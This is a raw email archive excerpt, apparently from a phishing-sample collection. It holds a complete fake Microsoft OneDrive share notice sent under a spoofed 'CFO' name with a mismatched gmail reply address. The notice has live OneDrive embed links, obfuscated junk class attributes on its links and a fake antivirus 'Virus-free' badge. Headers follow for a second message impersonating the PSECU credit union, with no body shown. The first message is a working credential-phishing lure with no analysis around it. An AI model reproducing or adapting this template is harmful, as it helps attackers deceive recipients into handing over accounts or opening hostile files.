From: "Mr. Ben Powell, CFO" <info@maffeihoh.com>
Date: Tue, 22 Oct 2019 10:15:23 -0400
Reply-To: benpowellcfo107@gmail.com
X-Antivirus: Avast (VPS 191022-2, 10/22/2019), Outbound message
X-Antivirus-Status: Clean
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - s19099459.onlinehome-server.info
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - maffeihoh.com
X-Get-Message-Sender-Via: s19099459.onlinehome-server.info: authenticated_id: info@maffeihoh.com
X-Authenticated-Sender: s19099459.onlinehome-server.info: info@maffeihoh.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Status: O
X-Status: 
X-Keywords:                  
X-UID: 202

You will not see this in a MIME-aware mail reader.
--===============0100668893==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

Hello,
 An official document has been shared with you through OneDrive.
 Access the document below on OneDrive.
  
  
   OneDrive
 
 
 
   
  Free online storage for your files. Check it out.
  Get the OneDrive mobile app.
Microsoft respects your privacy. To learn more, please read our Privacy Sta=
tement. Microsoft Corporation, One Microsoft Way, Redmond, WA, 98052

---
This email has been checked for viruses by Avast antivirus software.
https://www.avast.com/antivirus

--===============0100668893==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><P style=3D"MARGIN-BOTTOM: 0px; BACKGROUND: rg=
b(255,255,255); WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: non=
e; COLOR: rgb(0,0,0); FONT: 400 16px calibri, helvetica, sans-serif; ORPHAN=
S: 2; WIDOWS: 2; MARGIN-TOP: 0px; LETTER-SPACING: normal; TEXT-INDENT: 0px;=
 -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decor=
ation-color: initial">Hello,</P>
<P style=3D"MARGIN-BOTTOM: 0px; BACKGROUND: rgb(255,255,255); WHITE-SPACE: =
normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(0,0,0); FONT: 4=
00 16px calibri, helvetica, sans-serif; ORPHANS: 2; WIDOWS: 2; MARGIN-TOP: =
0px; LETTER-SPACING: normal; TEXT-INDENT: 0px; -webkit-text-stroke-width: 0=
px; text-decoration-style: initial; text-decoration-color: initial">An offi=
cial document has been shared with you through&nbsp;<SPAN style=3D"COLOR: r=
gb(0,111,201)"><STRONG>OneDrive</STRONG></SPAN>.</P>
<P style=3D"MARGIN-BOTTOM: 0px; BACKGROUND: rgb(255,255,255); WHITE-SPACE: =
normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(0,0,0); FONT: 4=
00 16px calibri, helvetica, sans-serif; ORPHANS: 2; WIDOWS: 2; MARGIN-TOP: =
0px; LETTER-SPACING: normal; TEXT-INDENT: 0px; -webkit-text-stroke-width: 0=
px; text-decoration-style: initial; text-decoration-color: initial">Access =
the document below on&nbsp;<SPAN style=3D"COLOR: rgb(0,111,201)"><STRONG>On=
eDrive</STRONG></SPAN>.</P>
<P style=3D"MARGIN-BOTTOM: 0px; BACKGROUND: rgb(255,255,255); WHITE-SPACE: =
normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(0,0,0); FONT: 4=
00 16px calibri, helvetica, sans-serif; ORPHANS: 2; WIDOWS: 2; MARGIN-TOP: =
0px; LETTER-SPACING: normal; TEXT-INDENT: 0px; -webkit-text-stroke-width: 0=
px; text-decoration-style: initial; text-decoration-color: initial">&nbsp;<=
/P>
<DIV style=3D"BACKGROUND: rgb(255,255,255); WHITE-SPACE: normal; WORD-SPACI=
NG: 0px; TEXT-TRANSFORM: none; COLOR: rgb(0,0,0); FONT: 400 10pt calibri, h=
elvetica, sans-serif; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-I=
NDENT: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial;=
 text-decoration-color: initial">
<TABLE style=3D"BACKGROUND: rgb(9,74,178)">
<TBODY>
<TR>
<TD style=3D"WIDTH: 42px; COLOR: rgb(255,255,255); PADDING-BOTTOM: 3px; PAD=
DING-TOP: 3px; PADDING-LEFT: 12px; PADDING-RIGHT: 12px"><A class=3D"91e9f89=
26b4d626c0d5c71d1c0fcd84374eca97d44b45e2c8df8a5f647a6c04d81972b80bb279df1d5=
46144eb7f526bce2e18b990f47d57a86515dfd28aabb7c8935ca372ad057b14c30ac2be2703=
faa05a5a7b23a5628b65c1896d89827c75adaria-goto-anchor 74eca97d44b45e2c8df8a5=
f647a6c04d81972b80bb279df1d546144eb7f526bce2e18b990f47d57a86515dfd28aabb7c8=
935ca372ad057b14c30ac2be2703faa05a5a7b23a5628b65c1896d89827c75adaria-goto-a=
nchor 81972b80bb279df1d546144eb7f526bce2e18b990f47d57a86515dfd28aabb7c8935c=
a372ad057b14c30ac2be2703faa05a5a7b23a5628b65c1896d89827c75adaria-goto-ancho=
r e2e18b990f47d57a86515dfd28aabb7c8935ca372ad057b14c30ac2be2703faa05a5a7b23=
a5628b65c1896d89827c75adaria-goto-anchor 8935ca372ad057b14c30ac2be2703faa05=
a5a7b23a5628b65c1896d89827c75adaria-goto-anchor 05a5a7b23a5628b65c1896d8982=
7c75adaria-goto-anchor daria-goto-anchor" style=3D"COLOR: rgb(153,0,153)" h=
ref=3D"https://onedrive.live.com/embed?cid=3D28A7083B22B6562A&amp;resid=3D2=
8A7083B22B6562A%21176&amp;authkey=3DAL-YcRPVOqcEvSI&amp;em=3D2" rel=3D"noop=
ener noreferrer" target=3D_blank data-orig-href=3D"https://onedrive.live.co=
m/embed?cid=3D28A7083B22B6562A&amp;resid=3D28A7083B22B6562A%21173&amp;authk=
ey=3DALtoOHaj74mATnE&amp;em=3D2" data-vdir-href=3D"https://mail.yandex.com/=
re.jsx?uid=3D904341836&amp;c=3DLIZA&amp;cv=3D19.1.53&amp;mid=3D170292360909=
947206&amp;h=3Da,NFIFcI7Y69D9v3olzZDujw&amp;l=3DaHR0cHM6Ly9vbmVkcml2ZS5saXZ=
lLmNvbS9lbWJlZD9jaWQ9MjhBNzA4M0IyMkI2NTYyQSZyZXNpZD0yOEE3MDgzQjIyQjY1NjJBJT=
IxMTczJmF1dGhrZXk9QUx0b09IYWo3NG1BVG5FJmVtPTI"><SPAN style=3D"COLOR: rgb(25=
5,255,255)"><STRONG>OneDrive</STRONG></SPAN></A></TD></TR></TBODY></TABLE><=
/DIV>
<P style=3D'BACKGROUND: rgb(255,255,255); WHITE-SPACE: normal; WORD-SPACING=
: 0px; TEXT-TRANSFORM: none; COLOR: rgb(51,51,51); FONT: 400 11px "lucida g=
rande", verdana, arial, helvetica, sans-serif; ORPHANS: 2; WIDOWS: 2; LETTE=
R-SPACING: normal; TEXT-INDENT: 0px; -webkit-text-stroke-width: 0px; text-d=
ecoration-style: initial; text-decoration-color: initial'></P>
<P style=3D"FONT-SIZE: 15px; FONT-FAMILY: Arial, sans-serif; WHITE-SPACE: n=
ormal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rg=
b(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal=
; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; -webkit-text-stroke=
-width: 0px; text-decoration-style: initial; text-decoration-color: initial=
; font-variant-ligatures: normal; font-variant-caps: normal"></P>
<TABLE style=3D"BACKGROUND: rgb(255,255,255); WHITE-SPACE: normal; WORD-SPA=
CING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(0,0,0); PADDING-BOTTOM: 0px; PA=
DDING-TOP: 0px; FONT: 400 16px calibri, helvetica, sans-serif; PADDING-LEFT=
: 3px; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; PADDING-RIGHT: 3px; T=
EXT-INDENT: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: ini=
tial; text-decoration-color: initial">
<TBODY>
<TR>
<TD style=3D"WIDTH: 285px"><IMG style=3D"MARGIN-BOTTOM: 6px; BORDER-TOP: 0p=
x; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; BORDER-LEFT: 0px" alt=3DOneDrive =
src=3D"https://resize.yandex.net/mailservice?url=3Dhttps%3A%2F%2Fp.sfx.ms%2=
FFooterLogo2.png&amp;proxy=3Dyes&amp;key=3D82aed06bb2e7bbd62fc5ad1d67b43f9e=
"></TD></TR>
<TR>
<TD>Free online storage for your files.&nbsp;<A class=3D"91e9f8926b4d626c0d=
5c71d1c0fcd84374eca97d44b45e2c8df8a5f647a6c04d81972b80bb279df1d546144eb7f52=
6bce2e18b990f47d57a86515dfd28aabb7c8935ca372ad057b14c30ac2be2703faa05a5a7b2=
3a5628b65c1896d89827c75adaria-goto-anchor 74eca97d44b45e2c8df8a5f647a6c04d8=
1972b80bb279df1d546144eb7f526bce2e18b990f47d57a86515dfd28aabb7c8935ca372ad0=
57b14c30ac2be2703faa05a5a7b23a5628b65c1896d89827c75adaria-goto-anchor 81972=
b80bb279df1d546144eb7f526bce2e18b990f47d57a86515dfd28aabb7c8935ca372ad057b1=
4c30ac2be2703faa05a5a7b23a5628b65c1896d89827c75adaria-goto-anchor e2e18b990=
f47d57a86515dfd28aabb7c8935ca372ad057b14c30ac2be2703faa05a5a7b23a5628b65c18=
96d89827c75adaria-goto-anchor 8935ca372ad057b14c30ac2be2703faa05a5a7b23a562=
8b65c1896d89827c75adaria-goto-anchor 05a5a7b23a5628b65c1896d89827c75adaria-=
goto-anchor daria-goto-anchor" style=3D"FONT-SIZE: 10pt; COLOR: rgb(25,106,=
212)" href=3D"https://onedrive.live.com/embed?cid=3D59CF81A0C8E030FC&amp;re=
sid=3D59CF81A0C8E030FC%21109&amp;authkey=3DABvpEHuJ5mjS4ho&amp;em=3D2" rel=
=3D"noopener noreferrer" target=3D_blank data-orig-href=3D"https://onedrive=
=2Elive.com/embed?cid=3D59CF81A0C8E030FC&amp;resid=3D59CF81A0C8E030FC%21109=
&amp;authkey=3DABvpEHuJ5mjS4ho&amp;em=3D2" data-vdir-href=3D"https://mail.y=
andex.com/re.jsx?uid=3D904341836&amp;c=3DLIZA&amp;cv=3D19.1.53&amp;mid=3D17=
0292360909947206&amp;h=3Da,K0dYIaP2a0iMO7iIc-zaHA&amp;l=3DaHR0cHM6Ly9vbmVkc=
ml2ZS5saXZlLmNvbS9lbWJlZD9jaWQ9NTlDRjgxQTBDOEUwMzBGQyZyZXNpZD01OUNGODFBMEM4=
RTAzMEZDJTIxMTA5JmF1dGhrZXk9QUJ2cEVIdUo1bWpTNGhvJmVtPTI"><STRONG>Check it o=
ut</STRONG>.</A></TD></TR>
<TR>
<TD><SPAN style=3D"FONT-SIZE: 10pt; VERTICAL-ALIGN: middle; COLOR: rgb(182,=
182,182)"><A class=3D"91e9f8926b4d626c0d5c71d1c0fcd84374eca97d44b45e2c8df8a=
5f647a6c04d81972b80bb279df1d546144eb7f526bce2e18b990f47d57a86515dfd28aabb7c=
8935ca372ad057b14c30ac2be2703faa05a5a7b23a5628b65c1896d89827c75adaria-goto-=
anchor 74eca97d44b45e2c8df8a5f647a6c04d81972b80bb279df1d546144eb7f526bce2e1=
8b990f47d57a86515dfd28aabb7c8935ca372ad057b14c30ac2be2703faa05a5a7b23a5628b=
65c1896d89827c75adaria-goto-anchor 81972b80bb279df1d546144eb7f526bce2e18b99=
0f47d57a86515dfd28aabb7c8935ca372ad057b14c30ac2be2703faa05a5a7b23a5628b65c1=
896d89827c75adaria-goto-anchor e2e18b990f47d57a86515dfd28aabb7c8935ca372ad0=
57b14c30ac2be2703faa05a5a7b23a5628b65c1896d89827c75adaria-goto-anchor 8935c=
a372ad057b14c30ac2be2703faa05a5a7b23a5628b65c1896d89827c75adaria-goto-ancho=
r 05a5a7b23a5628b65c1896d89827c75adaria-goto-anchor daria-goto-anchor" styl=
e=3D"FONT-SIZE: 10pt; COLOR: rgb(25,106,212)" href=3D"https://onedrive.live=
=2Ecom/embed?cid=3D59CF81A0C8E030FC&amp;resid=3D59CF81A0C8E030FC%21109&amp;=
authkey=3DABvpEHuJ5mjS4ho&amp;em=3D2" rel=3D"noopener noreferrer" target=3D=
_blank data-orig-href=3D"https://onedrive.live.com/embed?cid=3D59CF81A0C8E0=
30FC&amp;resid=3D59CF81A0C8E030FC%21109&amp;authkey=3DABvpEHuJ5mjS4ho&amp;e=
m=3D2" data-vdir-href=3D"https://mail.yandex.com/re.jsx?uid=3D904341836&amp=
;c=3DLIZA&amp;cv=3D19.1.53&amp;mid=3D170292360909947206&amp;h=3Da,K0dYIaP2a=
0iMO7iIc-zaHA&amp;l=3DaHR0cHM6Ly9vbmVkcml2ZS5saXZlLmNvbS9lbWJlZD9jaWQ9NTlDR=
jgxQTBDOEUwMzBGQyZyZXNpZD01OUNGODFBMEM4RTAzMEZDJTIxMTA5JmF1dGhrZXk9QUJ2cEVI=
dUo1bWpTNGhvJmVtPTI"><STRONG>Get the OneDrive mobile app.</STRONG></A></SPA=
N></TD></TR></TBODY></TABLE><SPAN style=3D"BACKGROUND: rgb(255,255,255); WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; COLOR: rgb(0,0,=
0); FONT: 400 10pt calibri, helvetica, sans-serif; ORPHANS: 2; WIDOWS: 2; L=
ETTER-SPACING: normal; TEXT-INDENT: 0px; -webkit-text-stroke-width: 0px; te=
xt-decoration-style: initial; text-decoration-color: initial">Microsoft res=
pects your privacy. To learn more, please read our&nbsp;<A class=3D"91e9f89=
26b4d626c0d5c71d1c0fcd84374eca97d44b45e2c8df8a5f647a6c04d81972b80bb279df1d5=
46144eb7f526bce2e18b990f47d57a86515dfd28aabb7c8935ca372ad057b14c30ac2be2703=
faa05a5a7b23a5628b65c1896d89827c75adaria-goto-anchor 74eca97d44b45e2c8df8a5=
f647a6c04d81972b80bb279df1d546144eb7f526bce2e18b990f47d57a86515dfd28aabb7c8=
935ca372ad057b14c30ac2be2703faa05a5a7b23a5628b65c1896d89827c75adaria-goto-a=
nchor 81972b80bb279df1d546144eb7f526bce2e18b990f47d57a86515dfd28aabb7c8935c=
a372ad057b14c30ac2be2703faa05a5a7b23a5628b65c1896d89827c75adaria-goto-ancho=
r e2e18b990f47d57a86515dfd28aabb7c8935ca372ad057b14c30ac2be2703faa05a5a7b23=
a5628b65c1896d89827c75adaria-goto-anchor 8935ca372ad057b14c30ac2be2703faa05=
a5a7b23a5628b65c1896d89827c75adaria-goto-anchor 05a5a7b23a5628b65c1896d8982=
7c75adaria-goto-anchor daria-goto-anchor" style=3D"FONT-SIZE: 10pt; COLOR: =
rgb(25,106,212)" href=3D"https://onedrive.live.com/embed?cid=3D59CF81A0C8E0=
30FC&amp;resid=3D59CF81A0C8E030FC%21109&amp;authkey=3DABvpEHuJ5mjS4ho&amp;e=
m=3D2" rel=3D"noopener noreferrer" target=3D_blank data-orig-href=3D"https:=
//onedrive.live.com/embed?cid=3D59CF81A0C8E030FC&amp;resid=3D59CF81A0C8E030=
FC%21109&amp;authkey=3DABvpEHuJ5mjS4ho&amp;em=3D2" data-vdir-href=3D"https:=
//mail.yandex.com/re.jsx?uid=3D904341836&amp;c=3DLIZA&amp;cv=3D19.1.53&amp;=
mid=3D170292360909947206&amp;h=3Da,K0dYIaP2a0iMO7iIc-zaHA&amp;l=3DaHR0cHM6L=
y9vbmVkcml2ZS5saXZlLmNvbS9lbWJlZD9jaWQ9NTlDRjgxQTBDOEUwMzBGQyZyZXNpZD01OUNG=
ODFBMEM4RTAzMEZDJTIxMTA5JmF1dGhrZXk9QUJ2cEVIdUo1bWpTNGhvJmVtPTI"><STRONG>Pr=
ivacy</STRONG>&nbsp;<STRONG>Statement</STRONG></A>. Microsoft Corporation, =
One Microsoft Way, Redmond, WA, 98052</SPAN><div id=3D"DAB4FAD8-2DD7-40BB-A=
1B8-4E2AA1F9FDF2"><br />
<table style=3D"border-top: 1px solid #D3D4DE;">
	<tr>
        <td style=3D"width: 55px; padding-top: 13px;"><a href=3D"https://ww=
w.avast.com/sig-email?utm_medium=3Demail&utm_source=3Dlink&utm_campaign=3Ds=
ig-email&utm_content=3Demailclient&utm_term=3Dicon" target=3D"_blank"><img =
src=3D"https://ipmcdn.avast.com/images/icons/icon-envelope-tick-round-orang=
e-animated-no-repeat-v1.gif" alt=3D"" width=3D"46" height=3D"29" style=3D"w=
idth: 46px; height: 29px;" /></a></td>
		<td style=3D"width: 470px; padding-top: 12px; color: #41424e; font-size: =
13px; font-family: Arial, Helvetica, sans-serif; line-height: 18px;">Virus-=
free. <a href=3D"https://www.avast.com/sig-email?utm_medium=3Demail&utm_sou=
rce=3Dlink&utm_campaign=3Dsig-email&utm_content=3Demailclient&utm_term=3Dli=
nk" target=3D"_blank" style=3D"color: #4453ea;">www.avast.com</a>
		</td>
	</tr>
</table><a href=3D"#DAB4FAD8-2DD7-40BB-A1B8-4E2AA1F9FDF2" width=3D"1" heigh=
t=3D"1"> </a></div></BODY></HTML>
--===============0100668893==--

From jose@monkey.org Tue Oct 22 15:55:03 2019 +0000
Return-Path: alerts@psecu.com
Delivered-To: jose@monkey.org
X-FDA: 76071869286.17.jelly29_65a1e6577c14e
X-Spam-Summary: 50,0,0,e840aa65a335c612,d41d8cd98f00b204,alerts@psecu.com,:alerts@psecu.com,RULES_HIT:2:41:72:355:379:962:967:969:973:983:988:989:1189:1208:1221:1260:1313:1314:1345:1381:1431:1433:1434:1436:1437:1516:1517:1518:1535:1559:1571:1575:1588:1592:1594:1606:1714:1730:1748:1777:1792:2198:2199:2525:2527:2560:2563:2610:2682:2685:2859:2890:2909:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3690:3865:3867:3870:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4118:4321:4605:5007:6096:6261:6650:6678:6687:7652:8511:8518:8583:8603:9025:9080:9468:9908:10004:10346:11473:11529:11657:11658:11914:12043:12050:12297:12555:12561:12740:12895:12986:13110:13139:13237:13439:13546:14096:14194:14985:21080:21433:21450:21451:21483:21524:21554:21611:21627:21810:21838:21972:30001:30016:30026:30054,0,RBL:64.8.71.22:@psecu.com:.lbl8.mailshell.net-62.4.0.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:ff,MSBL:0,DNSBL:neutral,C
X-HE-Tag: jelly29_65a1e6577c14e
X-Filterd-Recvd-Size: 7732
Received: from smtp.zoominternet.net (mailrelay.armstrong.synacor.com [64.8.71.22])
	by imf12.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue, 22 Oct 2019 15:54:54 +0000 (UTC)
Return-Path: <alerts@psecu.com>
X_CMAE_Category: , ,
X-CNFS-Analysis: v=2.3 cv=cZWsUULM c=1 sm=1 tr=0 a=Qm7GKbNR0eOzwXqrLdVb0Q==:117 a=Qm7GKbNR0eOzwXqrLdVb0Q==:17 a=KGjhK52YXX0A:10 a=XobE76Q3jBoA:10 a=XCzNhTxBZI4A:10 a=KXl77lDgDEgIEtoqJYcA:9 a=uG3r9SemXvz_DlDo9ukA:9 a=wPNLvfGTeEIA:10 a=i03BzuXDAAAA:8 a=5sWQQmbp-im7L1RkNuoA:9 a=_A-SZShXGqW8QwE9:21 a=_W_S_7VecoQA:10 a=u6_YviWoQmoA:10 a=QsekZt0_09AA:10 a=xsaDDriepnw46L0KzkMA:9 a=mpd-woop7mMA:10 a=PZBz_6FZhEqAY3Wd_dYU:22
X-CM-Score: 0
X-Scanned-by: Cloudmark Authority Engine
X-Authed-Username: YWxlcnRzQHBzZWN1LmNvbQ==
X_CMAE_Category: , ,
X-CNFS-Analysis: 
X-CM-Score: 
X-Scanned-by: Cloudmark Authority Engine
Received: from [72.23.238.32] ([72.23.238.32:43706] helo=EC2AMAZ-BNF4K1O.ec2.internal)
	by smtp.zoominternet.net (envelope-from <alerts@psecu.com>)
	(ecelerity 3.6.2.43620 r(Platform:3.6.2.0)) with ESMTP
	id 0D/CD-32243-9462FAD5; Tue, 22 Oct 2019 11:54:51 -0400
Content-Type: multipart/alternative; boundary="===============1488515221=="
Message-ID: <0D.CD.32243.9462FAD5@smtp02.armstrong.cmh.synacor.com>
MIME-Version: 1.0
Subject: PSECU Security Assistance
To: Recipients <alerts@psecu.com>
